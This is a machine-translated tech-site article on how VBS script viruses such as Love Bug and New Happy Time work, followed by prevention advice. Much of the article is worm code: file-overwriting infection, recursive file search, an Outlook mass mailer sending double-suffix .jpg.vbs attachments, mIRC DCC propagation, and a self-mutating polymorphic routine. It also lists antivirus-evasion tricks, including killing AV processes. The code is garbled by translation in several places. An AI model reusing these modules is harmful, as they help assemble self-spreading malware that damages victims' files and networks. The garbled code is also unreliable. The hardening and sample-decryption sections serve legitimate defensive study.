Shulou(Shulou.com)06/03 Report--

This article mainly introduces "how to understand and prevent the principle of VBS script virus". In daily operation, I believe many people have doubts about how to understand and prevent the principle of VBS script virus. The editor consulted all kinds of materials and sorted out simple and easy-to-use operation methods. I hope it will be helpful to answer the doubts about "how to understand and prevent VBS script virus principle". Next, please follow the editor to study!

The popularity of the Internet makes our world a better place, but it also has unpleasant times. When you receive an email with the theme "I Love You" and click on the attachment with a mouse that is almost trembling with excitement; when you browse a trusted website and find that the speed of opening each folder is very slow, do you realize that the virus has entered your world? The "Love Worm" network worm broke out in Europe and the United States on May 4, 2000. As a result of its spread through the e-mail system, the love bug virus attacked millions of computers around the world in just a few days. The network systems of many large enterprises, including Microsoft, Intel and so on, have been paralyzed, and the global economy has lost billions of dollars. The outbreak of the new happy hour virus last year has so far made the majority of computer users even more miserable.

One of the biggest common features of the two viruses mentioned above is that they are written in VBScript. The VBS script virus represented by Love Bug and New Happy time virus is very rampant, and one of the important reasons is that it is easy to write. Let's analyze the various aspects of the VBS script virus one by one:

First, the characteristics and development status of Vbs script virus.

VBS virus is written in VBScript, the script language is very powerful, they make use of the open characteristics of the Windows system, by calling some ready-made Windows objects, components, can directly control the file system, registry, etc., the function is very powerful. It should be said that a virus is an idea, but this idea becomes extremely easy to implement in VBS. VBS scripting viruses have the following characteristics:

1. it is easy to write, and a virus enthusiast who previously knew nothing about the virus can make up a new virus in a very short time.

2. The destructive power is great. Its destructive power is not only shown in the destruction of user system files and performance. He can also crash the mail server and seriously block the network.

3. Strong infection. Because the script is directly interpreted and executed, and it does not need to do complex PE file format processing like PE viruses, this kind of virus can directly infect other similar files through self-replication, and self-exception handling becomes very easy.

4. It spreads widely. Such viruses can spread around the world in a very short period of time through htm documents, Email attachments or other means.

5. The source code of the virus is easy to obtain and has many varieties. Due to the interpretation and execution of VBS virus, its source code is very readable, even after the virus source code has been encrypted, the acquisition of its source code is still relatively simple. Therefore, there are many variants of this kind of virus, so if you change the structure of the virus slightly, or modify the eigenvalues, many antivirus software may be powerless.

6. Deceptive. Script viruses in order to get the opportunity to run, often use a variety of means that users do not pay attention to, for example, the attachment name of the message uses a double suffix, such as .jpg.vbs, because the system does not display the suffix by default, so when users see this file, they will think it is a jpg image file.

7. Make the virus production machine very easy to implement. The so-called virus production machine is a machine that can produce viruses according to the wishes of users (which, of course, refers to programs). The reason why most of the current virus production machines are script virus production machines, the most important point is that the script is interpreted and executed, which is very easy to implement, which we will talk about later.

Because of the above characteristics, the script virus develops very rapidly, especially the emergence of the virus production machine, which makes it very easy to generate a new type of script virus.

Second, the principle analysis of Vbs script virus.

How to infect 1.vbs script virus and search for files

VBS script viruses generally infect files directly through self-replication, and most of the code in the virus can be directly attached to other similar programs. For example, the New Happy hour virus can attach its own code to the end of the .htm file and add a statement at the top to call the virus code, while the love bug virus directly generates a copy of the file and copies the virus code into it. The original file name is used as the prefix of the virus file name and vbs is used as the suffix. Let's analyze the infection and search principle of this kind of virus through part of the code of love bug virus:

Here are some of the key codes for file infection:

Set fso=createobject ("scripting.filesystemobject") 'create a file system object

Set self=fso.opentextfile (wscript.scriptfullname,1) 'read to open the current file (that is, the virus itself)

Vbscopy=self.readall 'reads all the code of the virus to the string variable vbscopy.

Set ap=fso.opentextfile (target file .path, 2focus true) 'write and open the target file, ready to write virus code

Ap.write vbscopy 'overwrites the virus code to the target file

Ap.close

Set cop=fso.getfile (target file .path) 'gets the path to the target file

Cop.copy (target file. Path & ".vbs") 'create another virus file (suffixed with .vbs)

Target file .delete (true) 'Delete the target file

The above describes how the virus file infects the normal file: first assign the virus itself code to the string variable vbscopy, then overwrite the string to the target file, create a copy of the file with the target file name prefix and vbs as the suffix, and finally delete the target file.

Let's analyze the file search code in detail:

'This function is mainly used to find files that meet the conditions and generate a virus copy of the corresponding file

Sub scan (folder_) 'scan function definition

On error resume next if there is an error, skip it directly to prevent the error window from popping up

Set folder_=fso.getfolder (folder_)

Set files=folder_.files' collection of all files in the current directory

For each file in filesext=fso.GetExtensionName (file) 'gets the file suffix

Ext=lcase (ext) 'suffix is converted to lowercase letters

If ext= "mp5" then 'infection occurs if the suffix is mp5. Please create your own files with corresponding suffixes, preferably abnormal suffixes, so as not to break the normal procedure.

Wscript.echo (file)

End if

Next

Set subfolders=folder_.subfolders

For each subfolder in subfolders' search for other directories; recursive call

Scan ()

Scan (subfolder)

Next

End sub

The above code is the VBS script virus for file search code analysis. The search part of the scan () function is relatively short and ingenious, using a recursive algorithm to traverse the entire partition's directories and files.

Several ways and Code Analysis of 2.vbs script virus spreading through the Network

The wide spread of VBS script virus mainly depends on its network transmission function. Generally speaking, VBS script virus spreads in the following ways:

1) spread through Email attachment

This is a very common way to spread, and viruses can get legitimate Email addresses in a variety of ways, the most common of which is to take email addresses directly from outlook address books, or to search for Email addresses in user documents (such as htm files) through programs.

Let's take a closer look at how the VBS scripting virus does this:

Function mailBroadcast ()

On error resume next

Wscript.echo

Set outlookApp = CreateObject ("Outlook.Application") / / create an object for OUTLOOK application

If outlookApp= "Outlook" Then

Set mapiObj=outlookApp.GetNameSpace ("MAPI") / / get the namespace of MAPI

Set addrList= mapiObj.AddressLists / / get the number of address tables

For Each addr In addrList

If addr.AddressEntries.Count 0 Then

AddrEntCount = addr.AddressEntries.Count / / get the number of Email records for each address table

For addrEntIndex= 1 To addrEntCount / / traverses the Email address of the address table

Set item = outlookApp.CreateItem (0) / / get a mail object instance

Set addrEnt = addr.AddressEntries (addrEntIndex) / / get the specific Email address

Item.To = addrEnt.Address / / fill in the recipient's address item.Subject = "virus transmission experiment" / / write the email title

Item.Body = "this is the virus email transmission test, please do not panic when you receive this letter!" / / write the contents of the file

Set attachMents=item.Attachments / / define email attachments

AttachMents.Add fileSysObj.GetSpecialFolder (0) & "\ test.jpg.vbs"

Item.DeleteAfterSubmit = True / / automatically delete a letter after it is submitted

If item.To "" Then

Item.Send / / send email

ShellObj.regwrite "HKCU\ software\ Mailtest\ mailed", "1" / / virus tag to avoid repeated infection

End If

Next

End If

Next

End if

End Function

2) share and spread through local area network

Local area network sharing communication is also a very common and effective way of network communication. Generally speaking, in order to facilitate communication in the local area network, there must be many shared directories with writeable permissions. For example, when win2000 creates shares, the default is writable permissions. In this way, the virus can spread the virus code to these directories by searching these shared directories.

In VBS, there is an object that can search and manipulate shared folders on the Internet. We can use this object to achieve the purpose of communication.

Welcome_msg = "Network connection search Test"

Set WSHNetwork = WScript.CreateObject ("WScript.Network") 'create a network object

Set oPrinters = WshNetwork.EnumPrinterConnections' create a list of network printer connections

WScript.Echo "Network printer mappings:"

For I = 0 to oPrinters.Count-1 Step 2 'shows the connection of the network printer

WScript.Echo "Port" & oPrinters.Item (I) & "=" & oPrinters.Item (iTun1)

Next

Set colDrives = WSHNetwork.EnumNetworkDrives' create a list of network shared connections

If colDrives.Count = 0 Then

MsgBox "there are no drives to list." , vbInformation + vbOkOnly,welcome_msg

Else

StrMsg = "current network drive connection:" & CRLF

For I = 0 To colDrives.Count-1 Step 2

StrMsg = strMsg & Chr (13) & Chr (10) & colDrives (I) & Chr (9) & colDrives (I + 1)

Next

MsgBox strMsg, vbInformation + vbOkOnly, welcome_msg' displays the current network drive connection

End If

Above is a complete script to find the current printer connection and network sharing connection and display them. After knowing the shared connection, we can read and write files directly to the target drive.

3) spread by infecting web pages such as htm, asp, jsp, php, etc.

Nowadays, WWW services have become very common. By infecting files such as htm, viruses are bound to infect all user machines that have visited the web page.

The reason why the virus can play a powerful function in htm files adopts the same principle as the malicious code of most web pages. Basically, they use the same code, but you can also use other code, which is the key to the ability of objects such as virus FSO,WSH to run in a web page. Under the registry HKEY_CLASSES_ROOT\ CLSID\, we can find such a primary key {F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}, which is described as "Windows Script Host Shell Object" in the registry. Similarly, we can also find {0D43FE01-F093-11CF-8940-00A0C9054228}, which is described as "FileSystem Object" in the registry. Generally, the COM should be initialized first, after the corresponding component object is obtained. Viruses can correctly use FSO and WSH objects to invoke their powerful functions. The code is as follows:

Set Apple0bject = document.applets ("KJ_guest")

Apple0bject.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")

Apple0bject.createInstance () 'create an instance

Set WsShell Apple0bject.Get0bject ()

Apple0bject.setCLSID ("{0D43FE01-F093-11CF-8940-00A0C9054228}")

Apple0bject.createInstance () 'create an instance

Set FSO = Apple0bject.Get0bject ()

For other types of files, I will not analyze them one by one.

4) spread through IRC chat channel

Generally speaking, the following code is used for virus transmission through IRC (take MIRC as an example)

Dim mirc

Set fso=CreateObject ("Scripting.FileSystemObject")

Set mirc=fso.CreateTextFile ("C:\ mirc\ script.ini") 'create the file script.ini

Fso.CopyFile Wscript.ScriptFullName, "C:\ mirc\ attachment.vbs", True 'back up virus files to attachment.vbs

Mirc.WriteLine "[script]"

Mirc.WriteLine "n0=on 1if ($nick! = $me) {halt} / dcc send $nick C:\ mirc\ attachment.vbs}"

'use the command / ddc send $nick attachment.vbs to transfer virus files to other users in the channel

Mirc.Close

The above code is used to write one line of code to and from the Script.ini file, and a lot of other code will actually be written. Script.ini stores commands to control IRC sessions, and the commands in this file can be executed automatically. For example, the song worm virus Tun.VBS modifies c:\ mirc\ script.ini and c:\ mirc\ mirc.ini so that every time an IRC user uses an infected channel, he or she will receive a TUNE.VBS sent via DDC. Similarly, if Pirch98 is installed in the c:\ pirch98 directory of the target computer, the virus modifies c:\ pirch98\ events.ini and c:\ pirch98\ pirch98.ini so that every time an IRC user uses an infected channel, he or she will receive a TUNE.VBS sent via DDC.

In addition, the virus can also be spread through the now widespread KaZaA. The virus copies the virus file to the default shared directory of KaZaA so that when other users access the machine, it is possible to download the virus file and execute it. This method of transmission may work with the popularity of peer-to-peer sharing tools such as KaZaA.

There are some other methods of communication, which we will not enumerate here.

How the 3.VBS script virus gains control

How to gain control? This is an interesting topic, and the VBS script virus seems to make the most of it. The author lists several typical methods here:

1) modify the registry key

When windows starts, it automatically loads the program to which the keys and values under HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Run are directed. The script virus can add a key value to the virus program under this item, so that you can get control every time the machine starts. The method for vbs to modify the storage table is relatively simple, just call the following statement.

Wsh.RegWrite (strName, anyvalue [, strType])

2) execute through the mapping file

For example, our new happy hour changed the way dll is executed to wscript.exe. You can even map exe files to virus code.

3) deceive the user and let the user execute by himself

This way actually has something to do with the psychology of the user. For example, when the virus sends attachments, it uses a double suffix file name, because by default, the suffix is not displayed. For example, the vbs program named beauty.jpg.vbs is displayed as beauty.jpg, and users often click on it as a picture. Similarly, for the files on the user's own disk, when the virus infects them, the file name of the original file is prefixed and vbs is used as the suffix to generate a virus file, and the original file is deleted, so that the user may run the vbs file as his original file.

4) desktop.ini and folder.htt cooperate with each other

These two files can be used to configure the active desktop or to customize folders. If the user's directory contains these two files, the virus code in folder.htt will be triggered when the user enters the directory. This is a more effective way for the new happy hour virus to gain control. And with folder.htt, the exe file may also be triggered, which may also be an effective way for the virus to gain control!

There are many ways for the virus to gain control, and the author has a lot of room to play in this regard.

Several skills of 4.vbs script virus against Anti-virus Software

The ability to fight anti-virus software is also necessary for viruses to survive. In general, VBS scripting viruses use the following methods to fight antivirus software:

1) self-encryption

For example, the new happy hour virus, it can randomly select a key to encrypt part of its own code, so that each infected virus code is different, achieving the effect of polymorphism. This brings some difficulties to the traditional eigenvalue detection method. The virus can also further use deformation technology, so that the decrypted code of the encrypted virus after each infection is different.

Let's look at a simple vbs script transformation engine (from flyshadow)

Randomize

Set Of = CreateObject ("Scripting.FileSystemObject") 'create a file system object

VC = Of.OpenTextFile (WScript.ScriptFullName, 1). Readall 'reads its own code

FS = Array ("Of", "vC", "fS", "fSC") 'defines an array of characters to be replaced

For fSC = 0 To 3

VC = Replace (vC, fS (fSC), Chr ((Int (Rnd * 22) + 65)) & Chr ((Int (Rnd * 22) + 65)) 'take four random characters to replace the string in the array fS

Next

Of.OpenTextFile (WScript.ScriptFullName, 2, 1). Writeline vC 'writes the replaced code back to the file

The above code causes the VBS file to replace its Of,vC,fS,fSC four-string with a random string after each run, which largely prevents antivirus software from using eigenvalue detection to find it.

2) ingenious use of Execute function

Friends who have used the VBS program will be surprised: when a normal program uses the FileSystemObject object, some anti-virus software will scan the program and report that the risk of this Vbs file is high, but some VBS script viruses also use the FileSystemObject object, why there is no warning? The reason is simple, because these viruses skillfully use the Execute method. When some antivirus software detects the VBS virus, it will check whether the program declares that the FileSystemObject object is used, and if so, it will issue an alarm. If the virus converts this declaration code to a string and then executes it through the Execute (String) function, you can avoid some anti-virus software.

3) change the declaration method of some objects

For example, fso=createobject ("scripting.filesystemobject"), we change it to

Fso=createobject ("script" + "ing.filesyste" + "mobject") so that the filesystemobject object will not be found when the antivirus software statically scans it.

4) directly close the anti-virus software

VBS script is powerful, it can directly search the user process and then compare the process name, if the process is found to be anti-virus software, it will directly shut down and delete some of its key programs.

Introduction to the principle of 5.Vbs virus production machine

The so-called virus production machine refers to the software that can generate the virus source code directly according to the user's choice. This may seem incredible to many people, but it is actually very simple to implement for scripting viruses.

The script language is interpreted and executed, does not need to be compiled, does not need any checksum positioning in the program, and each statement is clearly separated. In this way, the virus function is made into many separate modules, and after the user makes the virus function choice, the production machine only needs to piece together the corresponding function modules, and finally make the corresponding code replacement and optimization. Due to space and other reasons, we will not give a detailed introduction here.

Third, how to prevent vbs script virus

1. How to extract (encrypt) script viruses from samples

For unencrypted script viruses, we can find them directly from virus samples. Now let's introduce how to extract encrypted VBS script viruses from virus samples. Here we take New Happy hour as an example.

Open folder.htt with JediEdit. We found that the total number of lines in this file is only 93, and the first line mlibL ^ gb`p) is omitted after CPK...;, which is very long!

89:Execute ("Dim KeyArr (3), ThisText" & vbCrLf& "KeyArr (0) = 3" & vbCrLf& "KeyArr (1) = 3" & vbCrLf& "KeyArr (2) = 3" & vbCrLf& "KeyArr (3) = 4" & vbCrLf& "For iTunes 1 To Len (ExeString)" & vbCrLf& "TempNum = Asc (Mid (ExeString,i) ) & vbCrLf& "If TempNum = 18 Then" & vbCrLf& "TempNum = 34" & vbCrLf& "End If" & vbCrLf& "TempChar = Chr (TempNum + KeyArr (I Mod 4))" & vbCrLf& "If TempChar = Chr (28) Then" & vbCrLf& "TempChar = vbCr" & vbCrLf& "ElseIf TempChar = Chr (29) Then" & vbCrLf& "TempChar = vbLf" & vbCrLf& "End If" & vbCrLf& "ThisText = ThisText & TempChar" & vbCrLf& "Next") 90:Execute (90:Execute) 91:

Lines 87 and 91 need not be explained, line 88 is an assignment of a string, which is obviously encrypted virus code. Looking at the last code ThisText = ThisText & TempChar in line 89, and adding the following line, we can certainly guess that ThisText contains the virus decryption code (brothers who are familiar with vbs can also analyze this decryption code, too simple! You should be able to see it without looking at the code at all. Line 90 executes the code in ThisText (the decrypted code).

So, what should we do next? Quite simply, we just need to decrypt the virus code and output the contents of ThisText to a text file. Because the above lines are vbscript, I created the following .txt file:

First of all, lines 88 and 89 of copy to the .txt file you just created, of course, if you want to see the implementation of the new happy hour, you can also enter line 90 at the end. Then enter the code to create the file and write ThisText to the file vbs on the following line, and the entire file looks like this:

ExeString = "Afi... 'line 88 code Execute (" Dim KeyAr... " 'line 89

Set fso=createobject ("scripting.filesystemobject") 'create a file system object

Set virusfile=fso.createtextfile ("resource.log", true) 'create a new file resource.log to store the decrypted virus code virusfile.writeline (ThisText)' and write the decrypted code to resource.log

OK! It's as simple as that, save the file, change the suffix .txt to .vbs (.vbe is also OK), double-click, you will find that there is a file resource.log in the file directory, how about opening this file? Is it the source code of "New Happy hour"?

Weakness of 2.vbs scripting virus

Because the vbs scripting virus is written in a scripting language, it is not as convenient and flexible as PE files, and its operation requires conditions (although this condition is available by default). The author believes that the VBS script virus has the following weaknesses:

1) most VBS script viruses need to use one object to run: FileSystemObject

2) the VBScript code is interpreted and executed through Windows Script Host.

3) the operation of VBS script virus needs the support of its associated program Wscript.exe.

4) viruses spread through web pages need the support of ActiveX

5) the virus transmitted through Email needs the automatic email sending function of OE, but most of the viruses are spread mainly by Email.

3. How to prevent and remove vbs script virus

In view of the weakness of the VBS script virus mentioned above, the author proposes the following centralized preventive measures:

1) disable the file system object FileSystemObject

Method: you can disable file system objects with the command regsvr32 scrrun.dll / u. Where regsvr32 is the executable file under Windows\ System. Or directly look for the scrrun.dll file to delete or rename.

Another way is to find a key for the primary key {0D43FE01-F093-11CF-8940-00A0C9054228} under HKEY_CLASSES_ROOT\ CLSID\ in the registry and click.

2) Uninstall Windows Scripting Host

In Windows 98 (same as NT 4.0or above), open [Control Panel] → [add / remove programs] → [Windows installer] → [Accessories], and cancel the item "Windows Scripting Host".

As in the above method, find a key for the primary key {F935DC22-1CF0-11D0-ADB9-00C04FD58A0B} in the registry under HKEY_CLASSES_ROOT\ CLSID\, click.

3) remove the mapping between VBS, VBE, JS, JSE file suffixes and applications

Click [my computer] → [View] → [folder options] → [File Type], and then remove the mapping of VBS, VBE, JS, JSE file suffixes to the application.

4) in the Windows directory, find WScript.exe, change the name or delete it. If you think you have a chance to use it in the future, you'd better change the name, of course, you can reinstall it later.

5) to thoroughly prevent the VBS network worm, you also need to set up your browser. We first open the browser and click the Custom level button in the Internet options security tab of the menu bar. Set everything in "ActiveX controls and plug-ins" to be disabled, so you won't be afraid. Ha ha, for example, if the ActiveX component of the new happy hour doesn't work, the function of network communication is over.

6) disable the automatic email sending and receiving function of OE

7) since worms mostly use file extensions to write articles, to guard against them, do not hide extensions of known file types in the system. Windows defaults to hide the extension names of known file types, changing it to display the extension names of all file types.

8) set the security level of the network connection of the system to at least "medium", which can prevent some harmful Java programs or some ActiveX components from infringing on the computer to some extent.

9) hehe, the last item should be known without saying that antivirus software is indeed necessary, although some antivirus software disappoints the majority of users, but the choice is for both sides. In this virus-ridden network, if your machine is not equipped with antivirus software, I think it is really incredible.

Fourth, the prospect of the development of all script viruses.

With the rapid development of the network, network worms begin to become popular, while VBS script worms become more prominent, not only in large numbers, but also powerful. As it is relatively simple to use scripting viruses, in addition to the current VBS scripting virus will continue to be popular, there will gradually be more other scripting viruses, such as PHP,JS,Perl virus.

But scripting is not the best tool for real virus technology enthusiasts to write viruses, and scripting viruses are relatively easy to remove and relatively easy to prevent. The author believes that scripting viruses will continue to be popular, but there are only a few scripting worms that can have as great an impact as Love Worm and New Happy hour.

At this point, the study on "how to understand and prevent the principle of VBS script virus" is over. I hope to be able to solve your doubts. The collocation of theory and practice can better help you learn, go and try it! If you want to continue to learn more related knowledge, please continue to follow the website, the editor will continue to work hard to bring you more practical articles!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.